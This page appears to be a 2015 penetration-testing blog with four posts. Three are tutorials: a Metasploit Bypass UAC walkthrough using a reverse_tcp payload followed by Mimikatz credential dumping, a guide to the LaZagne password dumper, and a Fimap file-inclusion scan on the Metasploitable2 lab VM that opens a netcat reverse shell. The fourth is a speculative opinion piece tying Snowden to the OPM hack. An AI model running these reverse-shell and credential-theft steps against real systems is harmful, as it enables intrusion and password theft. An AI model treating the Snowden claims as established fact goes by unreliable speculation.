System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

•July 4, 2015 • Leave a Comment

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

BypassUAC Mimikatz 4

Then type, “creds_all“:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!

Snowden and the OPM Government Hack, Does 1+1 = Traitor?

•June 14, 2015 • 3 Comments

snowden and putin

I have talked to several current and former government employees and this has been on my mind a lot today, so I thought I would throw it out there. Could Snowden’s intelligence files cracked by China and Russia be directly related to the OPM government hack?

Though many see Snowden as a privacy rights hero, in my mind he is firmly in the traitor column. Granted he exposed the depth of NSA spying on American citizens, but is that enough to ignore everything else he has done? Has there been any other time in the history of the US that a member of an intelligence agency fled to (China and then) Russia for asylum, taking with them almost 2 million secret documents, leaked other classified information that put US & allied tactics at risk and not been considered a traitor?

The encrypted files that Snowden took with him that he arrogantly considered “uncrackable” have, according to the Sunday Times, been cracked by both the Russians and Chinese. And the information in these files have forced the British MI6 to “pull agents out of live operations in hostile countries”.

But the issues isn’t that they just needed to remove agents from countries. According to BBC political correspondent Chris Mason, “the problem for UK authorities was not only the direct consequence that agents had been moved, but also the opportunity cost of those agents no longer being in locations where they were doing useful work“.

Basically these agents were “outed”. Their lives could have been at risk and it may even be hard to get replacement agents back into certain positions to restore the human intelligence links that were destroyed by Snowden’s “indiscretion”.

What has the effect of this been on the US? I wonder how the Chinese know to hack Anthem earlier this year that provided health insurance for many Federal Employees? And how is it that reportedly the exact same Chinese group hacked the OPM and recovered millions of government employees records including the very sensitive SF-86 security clearance forms?

Granted the OPM systems should have been better secured, as they monitored the Anthem hack earlier this year. An agency spokesman told Nextgov,OPM is closely monitoring the situation. Anthem informed OPM that it shut down the network in question and is working to ensure the security of its systems as it investigates the extent of the breach.”

Is Snowden to blame? As all the documents are classified we may never know. But if the Anthem and OPM hack can be traced back to the files stolen by Snowden, hopefully then the general public will see him as his actions seem to portray him.

 

The LaZagne Project dumps 22 Different Program Passwords

•May 23, 2015 • Leave a Comment

LaZagne Passwords

The LaZagne Project by Alessandro ZANNI is a nifty little utility that displays passwords for 22 Windows and 12 Linux programs. This is a nice tool for penetration testers when you want to quickly dump passwords after you gain access to a system.

For Windows, simply download the standalone version and run it. Running “laZagne.exe all” will dump all the passwords that it can find:

LaZagne 2

You need to have administrator access to pull user login passwords. For “verbose” mode, which adds additional information when it runs, simply add a “-v” switch. If you just want to pull individual passwords, simply run the program using one of the modules below:

LaZagne Password modules

According to the The LaZagne Project webpage it can display the following passwords:

LaZagne Password modules 2

LaZagne works fast and easy!

 

Mass Scanning a Website for File Inclusion Vulnerabilities using Fimap and Metasploitable

•May 15, 2015 • 1 Comment

Fimap by Iman Karim (https://tha-imax.de/git/root/fimap) is a great tool to scan a website for File Inclusion vulnerabilities. In this short tutorial I show how to scan the entire Metasploitable2 Purposefully Vulnerable VM with Fimap and spawn a remote shell!

Mass Scanning

Fimap can scan a target website and harvest links from it and store them so they can be used as input to its mass scan feature. Simply run fimap and use the “-H” switch to tell it to harvest links, “-u” to tell it the target website IP, “-d [x]” to tell it how deep to look for links and finally “-w [outputdirectory]” to tell it where to store the links, like so:

fimap scan one

Now that we have a list of target links stored in the “/tmp/urllist” file, we simply feed this back into Fimap to look for vulnerabilities:

fimap -m -l ‘/tmp/urllist’

This will take forever to run as I told it to pretty much harvest the links from the entire Metasploitable VM in the previous command, but check out the results:

fimap scan metasploitable

Holy cats, 688 possible File Inclusion vulnerabilities!

Exploiting via Remote Shell

One of the great things about Fimap is its ability to create a remote shell with the vulnerable page. So let’s try it with one of the 688 vulnerable pages. To do so, we simply run “fimap” with the “-x” switch:

  1. Type “fimap -x”
  2. A list of scanned domains will appear, select the the one (“1”) we just scanned.
  3. A huge list of vulnerable pages will appear, so let’s select say, “100”.
  4. Now at the Available Attacks screen, select “#2 – Spawn Pentestmonkey’s reverse shell”

RFI LFI Fimap

It will then tell you to open another terminal and run Netcat (netcat -v -l -p 4444). Then just hit enter in fimap and you have a remote Netcat shell!

fimap reverse shell

As you can see we have opened a remote shell through on of the vulnerable pages, nice! Now let’s try the other 588 possibilities. Well, maybe not, lol!

Conclusion

File Inclusion vulnerabilities are becoming more and more rare with current coding practices, but hopefully this shows that File Inclusion coding errors can be exploited for detrimental results. Companies need to be sure to use secure coding practices and test their websites for common vulnerabilities.

If you liked the tutorial, and want to learn more about ethical hacking, check out my book, “Basic Security Testing with Kali Linux“.

 
Follow

Get every new post delivered to your Inbox.

Join 326 other followers